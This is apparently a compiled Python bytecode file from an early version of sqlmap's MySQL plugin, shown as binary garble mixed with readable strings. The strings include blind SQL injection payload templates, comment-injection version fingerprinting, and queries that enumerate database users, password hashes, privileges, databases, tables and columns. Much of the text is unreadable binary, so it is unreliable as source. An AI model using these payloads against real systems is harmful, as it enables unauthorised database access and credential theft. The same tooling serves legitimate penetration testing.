³ņ ‰ŸFc@sZddkZddkZddkZddkZddklZdefd„ƒYZdS(i’’’’N(tUnionUsetMySQLMapcBs§eZdZd„Zd„Zd„Zd„Zd„Zd„Zd„Z d„Z d „Z d „Z d „Z d „Zd „Zd„Zd„Zd„Zd„ZRS(s] This class defines MySQL methods @author: Bernardo Damele and Daniele Bellucci cCsg||_tidƒ|_d|_d|_g|_g|_g|_h|_ h|_ t |_ dS(Nt sqlmapLogt( targstloggingt getLoggertloggert_MySQLMap__bannert_MySQLMap__currentDbt_MySQLMap__fingerprintt_MySQLMap__cachedUserst_MySQLMap__cachedDbst_MySQLMap__cachedTablest_MySQLMap__cachedColumnstFalset!_MySQLMap__has_information_schema(tselfR((s:/usr/local/www/apache22/data/stuff/sql/plugins/mysqlmap.pyt__init__s        cCs÷xštoč|idƒ}|djoPn|d}||idƒ}|djotd|‚n||}d|||!}d}xNt||ƒD]=}|dt||ƒ7}||djo|d7}q—q—W|i|d |ƒ}qW|S( Nt'i’’’’isUnenclosed ' in '%s's'%s'Rs%dt,sCHAR(%s)(tTruetfindt Exceptiontrangetordtreplace(Rt expressiontindext firstIndext lastIndextoldt unescapedti((s:/usr/local/www/apache22/data/stuff/sql/plugins/mysqlmap.pytunescape!s$     cCs|idddƒS(Ns AND ORD(MID((%s), %d, 1)) > %ds& AND ORD(MID((%s), %d, 1)) > %d AND '1s& AND ORD(MID((%s), %d, 1)) > %d AND "1(t injectionStm(R((s:/usr/local/www/apache22/data/stuff/sql/plugins/mysqlmap.pyt createStm;s c Cs†d}|ii|ƒ|idddƒ}|id|ƒ}|i|ƒ}||iijod}|ii|ƒdSnddddd d!f}xź|D]ā}xŁt |d|ddƒD]¼}t |ƒ}|id|d|d|ƒ}|id|ƒ}|i|ƒ}||iijoO|ddjo| dd!} n | d} d| d| | df} | Sn|} q¾WqœWdS("Ns-executing MySQL comment injection fingerprints /* NoValue */s /* NoValue */ AND '1s /* NoValue */ AND "1tnewValues)unable to perform MySQL comment injectioniČ}ié}i,~ib~i@œiXœi¤œiŗœiPĆixĆi“ĆiĀĆiis /*!%s AND 1=2*/s /*!%s AND 1=2*/ AND '1s /*!%s AND 1=2*/ AND "1t3iis%s.%s.%s(iČ}ié}(i,~ib~(i@œiXœ(i¤œiŗœ(iPĆixĆ(i“ĆiĀĆ( RtinfoR#t urlReplacet queryPageRt defaultResulttwarntNoneRtstr( RtlogMsgtstmtbaseUrlt newResulttwarnMsgtversionstelementtversiontprevVertmidVerttrueVer((s:/usr/local/www/apache22/data/stuff/sql/plugins/mysqlmap.pyt__commentCheckAsF       cCs |id|iƒ}|iip|Snd }d|}|iƒ}|o-|id|gƒ}|d||f7}n|iovtid|iƒ}|iƒd}tid|iƒo|d 7}n|id|gƒ}|d ||f7}n||i_ |S( NtMySQLt isactive fingerprint: %ss$ %scomment injection fingerprint: %ss ^([\d\.]+)is-log$s, logging enableds! %sbanner parsing fingerprint: %ss ( tparseFpR Rt exaustiveFpt_MySQLMap__commentCheckRtretsearchtgroupst fingerprint(RtactVertblanktvaluetcomVertbanVer((s:/usr/local/www/apache22/data/stuff/sql/plugins/mysqlmap.pytgetFingerprintss$     cCs=d}|ii|ƒ|ip|idƒ|_n|iS(Nsfetching banners VERSION()(RR'RtgetValue(RR.((s:/usr/local/www/apache22/data/stuff/sql/plugins/mysqlmap.pyt getBanners  cCs#d}|ii|ƒ|idƒS(Nsfetching current userscurrent_user()(RR'RI(RR.((s:/usr/local/www/apache22/data/stuff/sql/plugins/mysqlmap.pytgetCurrentUseršscCs<d}|ii|ƒ|io |iSn|idƒSdS(Nsfetching current databases database()(RR'R RI(RR.((s:/usr/local/www/apache22/data/stuff/sql/plugins/mysqlmap.pyt getCurrentDb”s   cCsßd}|ii|ƒd}|i|ƒ}t|ƒ p |djod}t|‚nd}|ii|ƒg}x@tt|ƒƒD],}d|}|i|ƒ}|i|ƒqˆW|o ||_nd}t|‚|S(Ns!fetching number of database userss,SELECT COUNT(DISTINCT(user)) FROM mysql.usert0s/unable to retrieve the number of database userssfetching database userss'SELECT user FROM mysql.user LIMIT %d, 1s%unable to retrieve the database users( RR'RItlenRRtinttappendR (RR.R/tcountterrMsgtusersRtuser((s:/usr/local/www/apache22/data/stuff/sql/plugins/mysqlmap.pytgetUsers«s(    c Cs·|ip|iƒ|_nd}|ii|ƒh}xJ|iD]?}d}|d|7}|ii|ƒd}|d|7}|i|ƒ}t|ƒ p |djo+d}|d|7}|ii|ƒqCnd |}|ii|ƒg}xPtt|ƒƒD]<}d }|d ||f7}|i|ƒ} |i | ƒq W|o|||          c Cs6|ipd}|d7}t|‚n|iip-t|iƒp|iƒ}qœ|i}n<d|iijo|iiidƒ}n|iig}h}xY|D]Q}d|}|ii |ƒd}|d7}|d|7}|i |ƒ}t|ƒ p |djo+d }|d |7}|ii |ƒq©nd |}|ii |ƒg} xbt t |ƒƒD]N} d }|d 7}|d|7}|d| 7}|i |ƒ} | i| ƒqoW| o| ||= 5.0.0s DATABASE()sSCHEMA()s>= 5.0.2s< 5.1s#FROM information_schema.partitions s>= 5.1s= 5.0.0 or 5.0.1s< 5.0.0sCOERCIBILITY(USER())s >= 4.1.11t2s>= 4.1.1s< 4.1.11sCURRENT_USER()s>= 4.0.6s< 4.1.1sCHARSET(CURRENT_USER())tutf8s= 4.1.0s< 4.1.0s FOUND_ROWS()RMs>= 4.0.0s< 4.0.6sCONNECTION_ID()s >= 3.23.14s< 4.0.0s @[\w\.\-\_]+sUSER()s >= 3.22.11s < 3.23.14s < 3.22.11s VERSION()(RzR&R{(RtdbmstMySQLVerRBRRRR=RR'R-trandomtrandintRIR+R R R?R@RJR(RR.trandIntR/R2t coercibility((s:/usr/local/www/apache22/data/stuff/sql/plugins/mysqlmap.pyt checkDbms(s€                       (t__name__t __module__t__doc__RR"R$R>RHRJRKRLRURZR]RbRiRtRwRxR…(((s:/usr/local/www/apache22/data/stuff/sql/plugins/mysqlmap.pyR s$    2   7 . B L Y (RRR?ttimet lib.unionRR(((s:/usr/local/www/apache22/data/stuff/sql/plugins/mysqlmap.pyss